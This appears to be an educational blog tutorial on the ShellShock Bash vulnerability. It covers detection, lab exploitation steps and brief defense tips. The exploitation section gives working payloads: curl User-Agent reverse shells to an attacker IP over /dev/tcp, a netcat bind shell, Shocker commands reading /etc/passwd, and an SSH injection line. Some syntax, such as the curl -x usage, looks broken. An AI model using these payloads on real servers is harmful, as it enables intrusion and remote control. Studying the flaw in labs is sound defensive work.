Shellshock

Did you know that a single line of code in an environment variable could give hackers complete control over your server? This was the shocking reality of the ShellShock vulnerability in Bash — a flaw that shook the cybersecurity world back in 2014 and still affects outdated systems today. In this guide, we’ll break down what ShellShock is, how attackers exploit it, and how you can protect your servers using practical examples and step-by-step techniques.

Whether you’re an ethical hacker, penetration tester, or system administrator, understanding ShellShock is essential. By the end of this article, you’ll have actionable methods for testing, exploiting in a lab environment, and defending against this dangerous vulnerability.

What is ShellShock?

ShellShock is a vulnerability in the Bash shell, the command-line interface used in many Linux and Unix systems. The bug arises because Bash can run commands passed to it via environment variables — dynamic values that affect how processes run on your system.

The flaw is simple yet dangerous: an attacker can attach malicious code to an environment variable. When Bash processes the variable, the malicious code executes automatically, giving the attacker control of the system.

How to Identify Vulnerable Systems

Detecting ShellShock requires understanding the environment in which it operates. Here’s what to look for:

• Old Apache version: Servers running outdated Apache often expose vulnerable CGI scripts.

• CGI modules enabled: Check if the server has /cgi-bin/ directories.

• Vulnerability scanners: Tools like Nikto can quickly identify ShellShock-prone endpoints.

Exploitation Steps (Lab Environment)

1. Identify CGI Files

First, check if the server has any CGI files:

sudo python3 dirsearch.py -u http://10.10.10.56:80/cgi-bin/ -e cgi,sh

Look for .sh or .cgi files that could be executed by Bash.

2. Execute ShellShock Reverse Shell

Once you find a vulnerable CGI script, you can attach a payload to the User-Agent header:

curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1" \
http://192.168.2.18/cgi-bin/helloworld.cgi

Or using an alternative syntax:

curl -x TARGETADDRESS -H "User-Agent: () { ignored;}; /bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" \
$ip/cgi-bin/status

And using netcat:

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80

3. Using Nmap NSE Script

Nmap has a script specifically for ShellShock:

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

This allows you to check for vulnerable endpoints efficiently.

4. Shocker Tool

The open-source Shocker tool automates testing and exploitation:

git clone https://github.com/nccgroup/shocker
cd shocker
./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose

5. Exploiting ShellShock Over SSH

Even SSH can be affected if Bash is called on login:

ssh username@$ip '() { :;}; /bin/bash'

This executes the malicious function as soon as the user logs in.

Practical Defense Tips

Preventing ShellShock is far simpler than exploiting it:

• Update Bash: Ensure your system uses the latest patched Bash version.

• Harden CGI scripts: Avoid exposing scripts to the public unless necessary.

• Use firewalls and IDS/IPS: Block suspicious payloads before they reach the server.

• Regular vulnerability scans: Nikto, Nmap, and Shocker can be used proactively to detect risks.

• Segment networks: Limit exposure of vulnerable services to internal networks only.